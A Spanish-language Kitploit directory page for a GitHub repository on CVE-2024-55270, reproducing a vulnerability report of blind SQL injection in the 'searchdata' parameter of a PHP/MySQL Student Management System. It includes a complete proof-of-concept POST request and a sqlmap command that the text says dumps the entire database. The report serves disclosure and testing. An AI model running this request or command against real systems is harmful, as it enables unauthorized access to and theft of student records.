Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-55270 — Sistema de Gestión de Estudiantes usando PHP y MySQL | Kitploit
Herramientas/GitHubGitHub/shoaibalam112/cve-2024-55270
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubshoaibalam112/cve-2024-55270

CVE-2024-55270

Sistema de Gestión de Estudiantes usando PHP y MySQL

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Sistema de Gestión de Estudiantes 1.0 (CVE-2024-55270)

Resumen

El Sistema de Gestión de Estudiantes (SMS) es una aplicación web desarrollada usando PHP y MySQL para gestionar información de estudiantes. Este repositorio contiene el código fuente y los detalles del sistema, junto con un informe de vulnerabilidad de seguridad.

Auditor:
Shoaib Alam - Perfil de LinkedIn


Informe de Vulnerabilidad de Seguridad

Descripción

Se ha detectado una vulnerabilidad de Inyección SQL Ciega en el Sistema de Gestión de Estudiantes. Este problema afecta al parámetro searchdata en la funcionalidad de búsqueda de la aplicación.

  • Endpoint Vulnerable: /studentms/admin/search.php
  • Parámetro Vulnerable: searchdata

El parámetro searchdata es susceptible a Inyección SQL Ciega debido a una sanitización inadecuada de la entrada. Un atacante podría explotar esta vulnerabilidad inyectando consultas SQL maliciosas en la entrada searchdata, obteniendo potencialmente acceso no autorizado a la base de datos u otra información sensible.

Prueba de Concepto (PoC)

URL Vulnerable

/studentms/admin/search.php

Ejemplo de Solicitud POST

root@kitploit:~
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

searchdata=*&search=
  1. Guarde la solicitud POST anterior en req.txt usando el Bloc de notas o cualquier editor de texto.

  2. Utilice una herramienta como SQLMAP para explotar lo anterior aplicando este comando (puede personalizar el suyo): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3

El comando anterior volcará toda la base de datos de la aplicación web.

Descargar herramienta